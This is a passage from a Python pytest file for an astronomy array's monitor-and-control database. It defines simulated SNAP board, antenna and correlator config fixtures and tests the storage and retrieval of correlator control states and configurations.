        DATA_PATH, 'test_data', 'corr_config_example.yaml')
    with open(config_file, 'r') as fh:
        parsed = yaml.safe_load(fh)
    return config_file, parsed
@pytest.fixture(scope='module')
def corr_config_dict(corr_config):
    """Correlator config record: gps time, config hash, and parsed config."""
    return {'time': Time(1230372020, format='gps'),
            'hash': 'testhash', 'config': corr_config[1]}
@pytest.fixture(scope='module')
def init_args():
    # Expected repr of the argparse Namespace used when initializing SNAPs.
    return ("Namespace(config_file=None, eth=True, initialize=True, "
            + "mansync=False, noise=False, program=False, "
            + f"redishost='{TEST_DEFAULT_REDIS_HOST}', sync=True, tvg=False)")
@pytest.fixture(scope='module')
def snapversion(corr_config, init_args):
    """Example SNAP/correlator software version dict, keyed by package name.

    Each entry carries a report timestamp and version string; the 'snap'
    entry additionally carries the parsed config, its hash, the config
    timestamp, and the initialization arguments.
    """
    return {
        'udpSender:hera_node_keep_alive.py': {
            'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 17, 438357),
            'version': '0.0.1-1eaa49ea'},
        'hera_corr_f:hera_snap_redis_monitor.py': {
            'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 14, 317679),
            'version': '0.0.1-3c7fdaf6'},
        'udpSender:hera_node_cmd_check.py': {
            'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 17, 631614),
            'version': '0.0.1-1eaa49ea'},
        'udpSender:hera_node_receiver.py': {
            'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 16, 555086),
            'version': '0.0.1-1eaa49ea'},
        'hera_corr_cm': {
            'timestamp': datetime.datetime(2019, 4, 2, 19, 7, 17, 644984),
            'version': '0.0.1-11a573c9'},
        # The 'snap' entry reuses the corr_config and init_args fixtures.
        'snap': {'config': corr_config[1],
                 'config_md5': 'testhash',
                 'config_timestamp': datetime.datetime(
                     2019, 2, 18, 5, 41, 29, 376363),
                 'init_args': init_args,
                 'timestamp':
                     datetime.datetime(2019, 3, 27, 8, 28, 25, 806626),
                 'version': '0.0.1-3c7fdaf6'}}
@pytest.fixture(scope='module')
def snapstatus():
    """Simulated SNAP status dict keyed by SNAP hostname."""
    # both boards report the same programming time (datetime is immutable,
    # so sharing the object is safe)
    programmed = datetime.datetime(2016, 1, 10, 23, 16, 3)
    return {
        'heraNode700Snap0': {
            'last_programmed': programmed,
            'pmb_alert': False,
            'pps_count': 595687,
            'serial': 'SNPA000700',
            'temp': 57.984954833984375,
            'timestamp': datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
            'uptime': 595686,
        },
        'heraNode701Snap3': {
            'last_programmed': programmed,
            'pmb_alert': False,
            'pps_count': 595699,
            'serial': 'SNPD000703',
            'temp': 59.323028564453125,
            'timestamp': datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
            'uptime': 595699,
        },
    }
@pytest.fixture(scope='module')
def snapstatus_none():
    """SNAP status dict with the string 'None' standing in for missing values."""
    return {
        # all sensor fields missing; only the report timestamp is real
        'heraNode700Snap0': {'last_programmed': 'None',
                             'pmb_alert': 'None',
                             'pps_count': 'None',
                             'serial': 'None',
                             'temp': 'None',
                             'timestamp': datetime.datetime(
                                 2016, 1, 5, 20, 44, 52, 741137),
                             'uptime': 'None'},
        # real sensor values but a missing report timestamp
        'heraNode701Snap3': {'last_programmed':
                             datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
                             'pmb_alert': False,
                             'pps_count': 595699,
                             'serial': 'SNPD000703',
                             'temp': 59.323028564453125,
                             'timestamp': 'None',
                             'uptime': 595699}}
@pytest.fixture(scope='module')
def antstatus():
    """Simulated antenna status dict keyed by 'antenna_number:polarization'."""
    return {
        '4:e': {'timestamp': datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
                'f_host': 'heraNode700Snap0',
                'host_ant_id': 3,
                'adc_mean': -0.5308380126953125,
                'adc_rms': 3.0134560488579285,
                'adc_power': 9.080917358398438,
                'pam_atten': 0,
                'pam_power': -13.349140985640002,
                'pam_voltage': 10.248,
                'pam_current': 0.6541,
                'pam_id': [112, 217, 32, 59, 1, 0, 0, 14],
                'fem_voltage': 6.496,
                'fem_current': 0.5627000000000001,
                'fem_id': [0, 168, 19, 212, 51, 51, 255, 255],
                'fem_switch': 'antenna',
                'fem_e_lna_power': True,
                'fem_n_lna_power': True,
                'fem_imu_theta': 1.3621702512711602,
                'fem_imu_phi': 30.762719534238915,
                'fem_temp': 26.327341308593752,
                'fft_of': False,
                'eq_coeffs': (np.zeros((1024)) + 56.921875).tolist(),
                'histogram': [np.arange(-128, 182, dtype=np.int_).tolist(),
                              (np.zeros((256)) + 10).tolist()]},
        '31:n': {'timestamp':
                 datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
                 'f_host': 'heraNode4Snap3',
                 'host_ant_id': 7,
                 'adc_mean': -0.4805450439453125,
                 'adc_rms': 16.495319974304454,
                 'adc_power': 272.0955810546875,
                 'pam_atten': 0,
                 'pam_power': -32.03119784856,
                 'pam_voltage': 10.268,
                 'pam_current': 0.6695000000000001,
                 'pam_id': [112, 84, 143, 59, 1, 0, 0, 242],
                 # NaN values mimic FEM sensors that failed to report
                 'fem_voltage': float('nan'),
                 'fem_current': float('nan'),
                 'fem_id': [0, 168, 19, 212, 51, 51, 255, 255],
                 'fem_switch': 'noise',
                 'fem_e_lna_power': False,
                 'fem_n_lna_power': False,
                 'fem_imu_theta': 1.3621702512711602,
                 'fem_imu_phi': 30.762719534238915,
                 'fem_temp': 27.828854980468755,
                 'fft_of': True,
                 'eq_coeffs': (np.zeros((1024)) + 73.46875).tolist(),
                 'histogram': [np.arange(-128, 182, dtype=np.int_).tolist(),
                               (np.zeros((256)) + 12).tolist()]}}
@pytest.fixture(scope='module')
def antstatus_none():
    """Antenna status dict with 'None' strings standing in for missing values."""
    return {
        '4:e': {'timestamp': datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
                'f_host': 'None',
                'host_ant_id': 'None',
                'adc_mean': 'None',
                'adc_rms': 'None',
                'adc_power': 'None',
                'pam_atten': 'None',
                'pam_power': 'None',
                'pam_voltage': 'None',
                'pam_current': 'None',
                'pam_id': 'None',
                'fem_voltage': 'None',
                'fem_current': 'None',
                'fem_id': 'None',
                'fem_switch': 'None',
                'fem_e_lna_power': 'None',
                'fem_n_lna_power': 'None',
                'fem_imu_theta': 'None',
                'fem_imu_phi': 'None',
                'fem_temp': 'None',
                'fft_of': 'None',
                'eq_coeffs': 'None',
                'histogram': 'None'},
        '31:n': {'timestamp':
                 datetime.datetime(2016, 1, 5, 20, 44, 52, 739322),
                 'f_host': 'None',
                 'host_ant_id': 'None',
                 'adc_mean': 'None',
                 'adc_rms': 'None',
                 'adc_power': 'None',
                 'pam_atten': 'None',
                 'pam_power': 'None',
                 'pam_voltage': 'None',
                 'pam_current': 'None',
                 'pam_id': 'None',
                 # NaN (rather than 'None') exercises the float-nan path
                 'fem_voltage': float('nan'),
                 'fem_current': float('nan'),
                 'fem_id': 'None',
                 # an unrecognized switch string exercises the error path
                 'fem_switch': 'Unknown mode',
                 'fem_e_lna_power': 'None',
                 'fem_n_lna_power': 'None',
                 'fem_imu_theta': 'None',
                 'fem_imu_phi': 'None',
                 'fem_temp': 'None',
                 'fft_of': 'None',
                 'eq_coeffs': 'None',
                 'histogram': 'None'}}
def test_py3_hashing(feng_config):
    """MD5 of the config file matches the python 2.7 hash the correlator uses.

    The correlator hashes the raw file contents without an explicit encoding
    (python 2.7 style); encoding to utf-8 here must give the same digest.
    """
    expected_hash = '3b03414da0abe738aae071cccb911377'
    with open(feng_config[0], 'r') as fobj:
        contents = fobj.read()
    observed_hash = hashlib.md5(contents.encode('utf-8')).hexdigest()
    assert observed_hash == expected_hash
def test_add_corr_command_state(mcsession):
    """Add control states directly and retrieve them with various filters."""
    test_session = mcsession
    t1 = Time('2016-01-10 01:15:23', scale='utc')

    test_session.add_correlator_control_state(t1, 'taking_data', True)
    expected = corr.CorrelatorControlState(
        time=int(floor(t1.gps)), state_type='taking_data', state=True)
    result = test_session.get_correlator_control_state(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    test_session.add_correlator_control_state(t1, 'phase_switching', False)
    result = test_session.get_correlator_control_state(
        starttime=t1 - TimeDelta(3.0, format='sec'), state_type='taking_data')
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_correlator_control_state(
        state_type='taking_data')
    # Bug fix: this was `assert len(result_most_recent), 1`, which always
    # passes -- the comma makes 1 the assert *message*, not a comparison.
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    expected = corr.CorrelatorControlState(
        time=int(floor(t1.gps)), state_type='phase_switching', state=False)
    result = test_session.get_correlator_control_state(
        starttime=t1 - TimeDelta(3.0, format='sec'),
        state_type='phase_switching')
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_correlator_control_state(
        state_type='phase_switching')
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    result = test_session.get_correlator_control_state(
        starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
    assert len(result) == 2

    result_most_recent = test_session.get_correlator_control_state()
    # NOTE(review): result_most_recent is unused and the assert below
    # re-checks `result` from the previous query; this likely intended
    # `len(result_most_recent)` -- confirm get_correlator_control_state's
    # most-recent semantics before changing the expected count.
    assert len(result) == 2

    result = test_session.get_correlator_control_state(
        starttime=t1 + TimeDelta(200.0, format='sec'))
    assert result == []
def test_add_correlator_control_state_from_corrcm(mcsession, corrcommand):
    """Ingest a corr_cm state dict (testing mode) and check retrieval."""
    session = mcsession
    state_objs = session.add_correlator_control_state_from_corrcm(
        corr_state_dict=corrcommand, testing=True)
    for state_obj in state_objs:
        session.add(state_obj)

    t1 = Time(1512770942.726777, format='unix')
    expected = corr.CorrelatorControlState(
        time=int(floor(t1.gps)), state_type='taking_data', state=True)

    result = session.get_correlator_control_state(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    assert result[0].isclose(expected)

    most_recent = session.get_correlator_control_state(
        state_type='taking_data')
    assert len(most_recent) == 1
    assert most_recent[0].isclose(expected)

    # the overall most recent record is the noise_diode state (latest time)
    most_recent = session.get_correlator_control_state()
    assert len(most_recent) == 1
    assert most_recent[0].state_type == 'noise_diode'

    result = session.get_correlator_control_state(
        starttime=t1 - TimeDelta(3.0, format='sec'),
        stoptime=t1 + TimeDelta(5.0, format='sec'))
    assert len(result) == 3
def test_add_correlator_control_state_from_corrcm_nonetime_noprior(
        mcsession, corrstate_nonetime):
    """A None timestamp with no prior state is recorded at the current time."""
    session = mcsession
    session.add_correlator_control_state_from_corrcm(
        corr_state_dict=corrstate_nonetime)
    result = session.get_correlator_control_state(most_recent=True)
    assert len(result) == 1
    res_time = result[0].time
    # the recorded time should be "now"
    assert Time.now().gps - res_time < 2.
    expected = corr.CorrelatorControlState(
        time=res_time, state_type='taking_data', state=False)
    assert result[0].isclose(expected)
def test_add_correlator_control_state_from_corrcm_nonetime_priortrue(
        mcsession, corrcommand, corrstate_nonetime):
    """A None timestamp following a prior True state is recorded at "now"."""
    session = mcsession
    session.add_correlator_control_state_from_corrcm(
        corr_state_dict=corrcommand)
    session.add_correlator_control_state_from_corrcm(
        corr_state_dict=corrstate_nonetime)
    result = session.get_correlator_control_state(most_recent=True)
    assert len(result) == 1
    res_time = result[0].time
    # the recorded time should be "now"
    assert Time.now().gps - res_time < 2.
    expected = corr.CorrelatorControlState(
        time=res_time, state_type='taking_data', state=False)
    assert result[0].isclose(expected)
def test_add_correlator_control_state_from_corrcm_nonetime_priorfalse(
        mcsession, corrstate_nonetime):
    """A None timestamp following a prior False state keeps the prior time."""
    session = mcsession
    prior_state_dict = {'taking_data': {
        'state': False, 'timestamp': Time(1512770942, format='unix')}}
    session.add_correlator_control_state_from_corrcm(
        corr_state_dict=prior_state_dict)
    state_objs = session.add_correlator_control_state_from_corrcm(
        corr_state_dict=corrstate_nonetime, testing=True)
    session._insert_ignoring_duplicates(
        corr.CorrelatorControlState, state_objs)
    result = session.get_correlator_control_state(most_recent=True)
    expected = corr.CorrelatorControlState(
        time=Time(1512770942, format='unix').gps, state_type='taking_data',
        state=False)
    assert len(result) == 1
    assert result[0].isclose(expected)
def test_control_state_errors(mcsession):
    """Invalid times, state types, and timestamps all raise ValueError."""
    session = mcsession
    with pytest.raises(ValueError):
        session.add_correlator_control_state('foo', 'taking_data', True)
    t1 = Time('2016-01-10 01:15:23', scale='utc')
    with pytest.raises(ValueError):
        session.add_correlator_control_state(t1, 'foo', True)
    # a None timestamp with a True taking_data state is invalid
    bad_dict = {'taking_data': {'state': True, 'timestamp': None}}
    with pytest.raises(ValueError):
        session.add_correlator_control_state_from_corrcm(
            corr_state_dict=bad_dict, testing=True)
    # a None timestamp is only allowed for the taking_data state type
    bad_dict = {'phase_switching': {'state': False, 'timestamp': None}}
    with pytest.raises(ValueError):
        session.add_correlator_control_state_from_corrcm(
            corr_state_dict=bad_dict, testing=True)
@requires_redis
def test_add_corr_control_state_from_corrcm(mcsession):
    """Live redis: one most-recent row exists per control state type."""
    session = mcsession
    session.add_correlator_control_state_from_corrcm()
    for state_type in ('taking_data', 'phase_switching', 'noise_diode'):
        result = session.get_correlator_control_state(
            state_type=state_type, most_recent=True)
        assert len(result) == 1
def test_add_corr_config(mcsession, corr_config):
    """Add config files/statuses directly and retrieve them with filters."""
    test_session = mcsession
    t1 = Time('2016-01-10 01:15:23', scale='utc')
    t2 = t1 + TimeDelta(120.0, format='sec')
    config_hash = 'testhash'
    test_session.add_correlator_config_file(config_hash, corr_config[0])
    test_session.commit()
    test_session.add_correlator_config_status(t1, config_hash)
    test_session.commit()
    file_expected = corr.CorrelatorConfigFile(config_hash=config_hash,
                                              filename=corr_config[0])
    status_expected = corr.CorrelatorConfigStatus(time=int(floor(t1.gps)),
                                                  config_hash=config_hash)
    file_result = test_session.get_correlator_config_file(config_hash=config_hash)
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)
    # check you get the same thing using time filtering
    file_result, time_list = test_session.get_correlator_config_file()
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)
    status_result = test_session.get_correlator_config_status(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(status_result) == 1
    status_result = status_result[0]
    assert status_result.isclose(status_expected)
    # add a second config at a later time to exercise hash/time filtering
    config_hash2 = 'testhash2'
    test_session.add_correlator_config_file(config_hash2, corr_config[0])
    test_session.commit()
    test_session.add_correlator_config_status(t2, config_hash2)
    test_session.commit()
    result = test_session.get_correlator_config_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), config_hash=config_hash)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(status_expected)
    result_most_recent = test_session.get_correlator_config_status(
        config_hash=config_hash)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(status_expected)
    status_expected = corr.CorrelatorConfigStatus(
        time=int(floor(t2.gps)), config_hash=config_hash2)
    result = test_session.get_correlator_config_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), config_hash=config_hash2)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(status_expected)
    result_most_recent = test_session.get_correlator_config_status(
        config_hash=config_hash2)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(status_expected)
    # a time range spanning both statuses returns both
    result = test_session.get_correlator_config_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t2)
    assert len(result) == 2
    result_most_recent = test_session.get_correlator_config_status()
    assert len(result_most_recent) == 1
    # a start time after both statuses returns nothing
    result = test_session.get_correlator_config_status(
        starttime=t1 + TimeDelta(200.0, format='sec'))
    assert result == []
@pytest.mark.parametrize("rosetta_exists", (True, False))
def test_add_correlator_config_from_corrcm(mcsession, corr_config_dict, rosetta_exists):
    """Ingest a full config dict and verify every parsed config table.

    Covers the config file, status, params, active SNAPs, input-index and
    phase-switch-index tables, each via both hash and time filtering, with
    and without part_rosetta entries available for node/loc-num lookups.
    """
    test_session = mcsession
    corr_config_dict_use = copy.deepcopy(corr_config_dict)
    if not rosetta_exists:
        # use an earlier time before the part_rosetta entries start
        corr_config_dict_use["time"] = Time(1512770942, format='unix')
    corr_config_list = test_session.add_correlator_config_from_corrcm(
        config_state_dict=corr_config_dict_use, testing=True)
    for obj in corr_config_list:
        test_session.add(obj)
    test_session.commit()
    t1 = corr_config_dict_use["time"]
    status_result = test_session.get_correlator_config_status(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(status_result) == 1
    # --- config file table ---
    file_result = test_session.get_correlator_config_file(
        config_hash=status_result[0].config_hash)
    config_filename = 'correlator_config_' + str(int(floor(t1.gps))) + '.yaml'
    file_expected = corr.CorrelatorConfigFile(config_hash='testhash',
                                              filename=config_filename)
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)
    # check you get the same thing using time filtering
    file_result, time_list = test_session.get_correlator_config_file(
        starttime=t1 - TimeDelta(3.0, format='sec')
    )
    assert len(file_result) == 1
    file_result = file_result[0]
    assert file_result.isclose(file_expected)
    # --- config status table ---
    status_expected = corr.CorrelatorConfigStatus(time=int(floor(t1.gps)),
                                                  config_hash='testhash')
    assert len(status_result) == 1
    status_result = status_result[0]
    assert status_result.isclose(status_expected)
    # --- config params table ---
    config_params_result = test_session.get_correlator_config_params(
        config_hash=status_result.config_hash
    )
    # expected parameter values from the example config yaml
    config_param_dict = {
        'fft_shift': 15086,
        'fpgfile': "redis:snap_fengine_2020-07-16_1253.fpg",
        'dest_port': 8511,
        'log_walsh_step_size': 3,
        'walsh_order': 32,
        'walsh_delay': 600,
        'fengines': ','.join(
            ["heraNode700Snap0", "heraNode700Snap1", "heraNode700Snap2", "heraNode700Snap3"]
        ),
        'xengines': ','.join([str(xeng) for xeng in [0, 1]]),
        'x0:chan_range': ','.join([str(chan) for chan in [1536, 1920]]),
        'x1:chan_range': ','.join([str(chan) for chan in [1920, 2304]]),
        'x0:even:ip': '10.80.40.197',
        'x0:even:mac': '2207786215621',
        'x0:odd:ip': '10.80.40.206',
        'x0:odd:mac': '2207786215630',
        'x1:even:ip': '10.80.40.229',
        'x1:even:mac': '2207786215653',
        'x1:odd:ip': '10.80.40.238',
        'x1:odd:mac': '2207786215662',
    }
    assert len(config_params_result) == len(config_param_dict)
    # check that using the time options works too
    config_params_result2, time_list = test_session.get_correlator_config_params(
        starttime=t1 - TimeDelta(3.0, format='sec')
    )
    assert len(config_params_result2) == len(config_param_dict)
    assert len(time_list) == len(config_param_dict)
    for time_obj in time_list[1:]:
        assert time_obj == time_list[0]
    # retrieve each parameter individually, by hash and by time
    for param, val in config_param_dict.items():
        config_params_result = test_session.get_correlator_config_params(
            config_hash=status_result.config_hash,
            parameter=param,
        )
        config_params_expected = corr.CorrelatorConfigParams(
            config_hash='testhash',
            parameter=param,
            value=str(val),
        )
        assert len(config_params_result) == 1
        config_params_result = config_params_result[0]
        assert config_params_result.isclose(config_params_expected)
        # check that using the time options works too
        config_params_result, time_list = test_session.get_correlator_config_params(
            starttime=t1 - TimeDelta(3.0, format='sec'),
            parameter=param,
        )
        assert len(config_params_result) == 1
        config_params_result = config_params_result[0]
        assert config_params_result.isclose(config_params_expected)
    # --- active SNAP table ---
    config_active_snaps_result = test_session.get_correlator_config_active_snaps(
        config_hash=status_result.config_hash,
    )
    active_snaps_list = [
        "heraNode700Snap0", "heraNode700Snap1", "heraNode700Snap2", "heraNode700Snap3"
    ]
    assert len(config_active_snaps_result) == len(active_snaps_list)
    # check that we can also get the nodes & snap loc nums
    config_active_snaps_result, node_list, snap_loc_list = (
        test_session.get_correlator_config_active_snaps(
            config_hash=status_result.config_hash, return_node_loc_num=True,
        )
    )
    assert len(config_active_snaps_result) == len(active_snaps_list)
    # since the request doesn't specify a time, the rosetta mapping for "now" is used.
    for index, active_snap in enumerate(config_active_snaps_result):
        assert node_list[index] == int(active_snap.hostname.split('S')[0][8:])
        assert snap_loc_list[index] == int(active_snap.hostname[-1])
    # check that using the time options works too
    config_active_snaps_result2, time_list, node_list, snap_loc_list = (
        test_session.get_correlator_config_active_snaps(
            starttime=t1 - TimeDelta(3.0, format='sec'), return_node_loc_num=True
        )
    )
    assert len(config_active_snaps_result2) == len(active_snaps_list)
    assert len(time_list) == len(active_snaps_list)
    for index, active_snap in enumerate(config_active_snaps_result):
        if rosetta_exists:
            assert node_list[index] == int(active_snap.hostname.split('S')[0][8:])
            assert snap_loc_list[index] == int(active_snap.hostname[-1])
        else:
            # no rosetta entries at this earlier time -> no node/loc info
            assert node_list[index] is None
            assert snap_loc_list[index] is None
    for time_obj in time_list[1:]:
        assert time_obj == time_list[0]
    for index, result in enumerate(config_active_snaps_result):
        this_hostname = result.hostname
        assert this_hostname in active_snaps_list
        expected_result = corr.CorrelatorConfigActiveSNAP(
            config_hash='testhash',
            hostname=this_hostname,
        )
        assert result.isclose(expected_result)
        assert config_active_snaps_result2[index].isclose(expected_result)
    # --- input index table ---
    config_input_index_result = test_session.get_correlator_config_input_index(
        config_hash=status_result.config_hash
    )
    # expected correlator index -> (hostname, antenna position) mapping
    input_index_dict = {
        "0": {"hostname": "heraNode700Snap0", "ant_loc": 0},
        "1": {"hostname": "heraNode700Snap0", "ant_loc": 1},
        "2": {"hostname": "heraNode700Snap0", "ant_loc": 2},
        "3": {"hostname": "heraNode700Snap1", "ant_loc": 0},
        "4": {"hostname": "heraNode700Snap1", "ant_loc": 1},
        "5": {"hostname": "heraNode700Snap1", "ant_loc": 2},
        "6": {"hostname": "heraNode700Snap2", "ant_loc": 0},
        "7": {"hostname": "heraNode700Snap2", "ant_loc": 1},
        "8": {"hostname": "heraNode700Snap2", "ant_loc": 2},
        "9": {"hostname": "heraNode700Snap3", "ant_loc": 0},
        "10": {"hostname": "heraNode700Snap3", "ant_loc": 1},
        "11": {"hostname": "heraNode700Snap3", "ant_loc": 2},
    }
    assert len(config_input_index_result) == len(input_index_dict)
    # check that we can also get the nodes & snap loc nums
    config_input_index_result, node_list, snap_loc_list = (
        test_session.get_correlator_config_input_index(
            config_hash=status_result.config_hash, return_node_loc_num=True
        )
    )
    assert len(config_input_index_result) == len(input_index_dict)
    # since the request doesn't specify a time, the rosetta mapping for "now" is used.
    for index, input_index in enumerate(config_input_index_result):
        assert node_list[index] == int(input_index.hostname.split('S')[0][8:])
        assert snap_loc_list[index] == int(input_index.hostname[-1])
    # check that using the time options works too
    config_input_index_result2, time_list, node_list, snap_loc_list = (
        test_session.get_correlator_config_input_index(
            starttime=t1 - TimeDelta(3.0, format='sec'), return_node_loc_num=True
        )
    )
    assert len(config_input_index_result2) == len(input_index_dict)
    assert len(time_list) == len(input_index_dict)
    for index, input_index in enumerate(config_input_index_result2):
        if rosetta_exists:
            assert node_list[index] == int(input_index.hostname.split('S')[0][8:])
            assert snap_loc_list[index] == int(input_index.hostname[-1])
        else:
            assert node_list[index] is None
            assert snap_loc_list[index] is None
    for time_obj in time_list[1:]:
        assert time_obj == time_list[0]
    # retrieve each input index individually, by hash and by time
    for corr_index, info in input_index_dict.items():
        config_input_index_result = test_session.get_correlator_config_input_index(
            config_hash=status_result.config_hash,
            correlator_index=int(corr_index),
        )
        config_input_index_expected = corr.CorrelatorConfigInputIndex(
            config_hash='testhash',
            correlator_index=int(corr_index),
            hostname=info["hostname"],
            antenna_index_position=info["ant_loc"],
        )
        assert len(config_input_index_result) == 1
        config_input_index_result = config_input_index_result[0]
        assert config_input_index_result.isclose(config_input_index_expected)
        # check that using the time options works too
        config_input_index_result, time_list = test_session.get_correlator_config_input_index(
            starttime=t1 - TimeDelta(3.0, format='sec'),
            correlator_index=int(corr_index),
        )
        assert len(config_input_index_result) == 1
        config_input_index_result = config_input_index_result[0]
        assert config_input_index_result.isclose(config_input_index_expected)
    # --- phase switch index table ---
    config_phase_switch_result = test_session.get_correlator_config_phase_switch_index(
        config_hash=status_result.config_hash
    )
    # expected phase switch index -> (hostname, antpol position) mapping
    phase_switch_dict = {
        "1": {"hostname": "heraNode700Snap0", "antpol_index": 0},
        "2": {"hostname": "heraNode700Snap0", "antpol_index": 1},
        "3": {"hostname": "heraNode700Snap0", "antpol_index": 2},
        "4": {"hostname": "heraNode700Snap0", "antpol_index": 3},
        "5": {"hostname": "heraNode700Snap0", "antpol_index": 4},
        "6": {"hostname": "heraNode700Snap0", "antpol_index": 5},
        "7": {"hostname": "heraNode700Snap1", "antpol_index": 0},
        "8": {"hostname": "heraNode700Snap1", "antpol_index": 1},
        "9": {"hostname": "heraNode700Snap1", "antpol_index": 2},
        "10": {"hostname": "heraNode700Snap1", "antpol_index": 3},
        "11": {"hostname": "heraNode700Snap1", "antpol_index": 4},
        "12": {"hostname": "heraNode700Snap1", "antpol_index": 5},
        "13": {"hostname": "heraNode700Snap2", "antpol_index": 0},
        "14": {"hostname": "heraNode700Snap2", "antpol_index": 1},
        "15": {"hostname": "heraNode700Snap2", "antpol_index": 2},
        "16": {"hostname": "heraNode700Snap2", "antpol_index": 3},
        "17": {"hostname": "heraNode700Snap2", "antpol_index": 4},
        "18": {"hostname": "heraNode700Snap2", "antpol_index": 5},
        "19": {"hostname": "heraNode700Snap3", "antpol_index": 0},
        "20": {"hostname": "heraNode700Snap3", "antpol_index": 1},
        "21": {"hostname": "heraNode700Snap3", "antpol_index": 2},
        "22": {"hostname": "heraNode700Snap3", "antpol_index": 3},
        "23": {"hostname": "heraNode700Snap3", "antpol_index": 4},
        "24": {"hostname": "heraNode700Snap3", "antpol_index": 5},
    }
    assert len(config_phase_switch_result) == len(phase_switch_dict)
    # check that we can also get the nodes & snap loc nums
    config_phase_switch_result, node_list, snap_loc_list = (
        test_session.get_correlator_config_phase_switch_index(
            config_hash=status_result.config_hash, return_node_loc_num=True
        )
    )
    assert len(config_phase_switch_result) == len(phase_switch_dict)
    # since the request doesn't specify a time, the rosetta mapping for "now" is used.
    for index, ps_index in enumerate(config_phase_switch_result):
        assert node_list[index] == int(ps_index.hostname.split('S')[0][8:])
        assert snap_loc_list[index] == int(ps_index.hostname[-1])
    # check that using the time options works too
    config_phase_switch_result2, time_list, node_list, snap_loc_list = (
        test_session.get_correlator_config_phase_switch_index(
            starttime=t1 - TimeDelta(3.0, format='sec'), return_node_loc_num=True
        )
    )
    assert len(config_phase_switch_result2) == len(phase_switch_dict)
    assert len(time_list) == len(phase_switch_dict)
    for index, ps_index in enumerate(config_phase_switch_result2):
        if rosetta_exists:
            assert node_list[index] == int(ps_index.hostname.split('S')[0][8:])
            assert snap_loc_list[index] == int(ps_index.hostname[-1])
        else:
            assert node_list[index] is None
            assert snap_loc_list[index] is None
    for time_obj in time_list[1:]:
        assert time_obj == time_list[0]
    for index, result in enumerate(config_phase_switch_result):
        phase_switch_index = result.phase_switch_index
        this_dict = phase_switch_dict[str(phase_switch_index)]
        config_phase_switch_expected = corr.CorrelatorConfigPhaseSwitchIndex(
            config_hash='testhash',
            hostname=this_dict["hostname"],
            phase_switch_index=phase_switch_index,
            antpol_index_position=this_dict["antpol_index"],
        )
        assert result.isclose(config_phase_switch_expected)
        assert config_phase_switch_result2[index].isclose(config_phase_switch_expected)
def test_add_correlator_config_from_corrcm_match_prior(mcsession, corr_config_dict):
    """If the same config was active earlier, only a new status row results."""
    session = mcsession
    # test behavior when matching config exists at an earlier time
    t1 = Time(1230372020, format='gps')
    t0 = t1 - TimeDelta(30, format='sec')
    config_hash = 'testhash'
    config_filename = 'correlator_config_' + str(int(floor(t1.gps))) + '.yaml'
    session.add_correlator_config_file(config_hash, config_filename)
    session.commit()
    session.add_correlator_config_status(t0, config_hash)
    session.commit()
    config_objs = session.add_correlator_config_from_corrcm(
        config_state_dict=corr_config_dict, testing=True)
    status_expected = corr.CorrelatorConfigStatus(
        time=int(floor(t1.gps)), config_hash='testhash')
    assert config_objs[0].isclose(status_expected)
def test_add_correlator_config_from_corrcm_duplicate(mcsession, corr_config_dict):
    """If an identical config status already exists, nothing new is returned."""
    session = mcsession
    # test behavior when duplicate config exists
    t1 = Time(1230372020, format='gps')
    config_hash = 'testhash'
    config_filename = 'correlator_config_' + str(int(floor(t1.gps))) + '.yaml'
    session.add_correlator_config_file(config_hash, config_filename)
    session.commit()
    session.add_correlator_config_status(t1, config_hash)
    session.commit()
    config_objs = session.add_correlator_config_from_corrcm(
        config_state_dict=corr_config_dict, testing=True)
    assert len(config_objs) == 0
def test_config_errors(mcsession):
    """An invalid time argument raises ValueError."""
    with pytest.raises(ValueError):
        mcsession.add_correlator_config_status('foo', 'testhash')
@requires_redis
def test_add_correlator_config_from_corrcm_onsite(mcsession):
    """Live redis: config ingestion yields a sensible mix of objects."""
    result = mcsession.add_correlator_config_from_corrcm(testing=True)
    assert len(result) > 0
    if len(result) == 1:
        # should just be a status object because this file already exists
        assert result[0].__class__ == corr.CorrelatorConfigStatus
    else:
        # first should be a file object, then a bunch of objects for the
        # various parsed config tables, then finally a status object.
        class_list = [obj.__class__ for obj in result]
        assert class_list[0] == corr.CorrelatorConfigFile
        assert class_list[-1] == corr.CorrelatorConfigStatus
        for parsed_class in (corr.CorrelatorConfigParams,
                             corr.CorrelatorConfigActiveSNAP,
                             corr.CorrelatorConfigInputIndex,
                             corr.CorrelatorConfigPhaseSwitchIndex):
            assert parsed_class in class_list
@pytest.mark.parametrize(
    ("command"),
    list(set(corr.command_dict.keys())
         - {'take_data', 'update_config'}))
def test_control_command_no_recent_status(mcsession, command):
    """Each simple command issues one command object when no status exists."""
    session = mcsession
    # test things on & off with no recent status
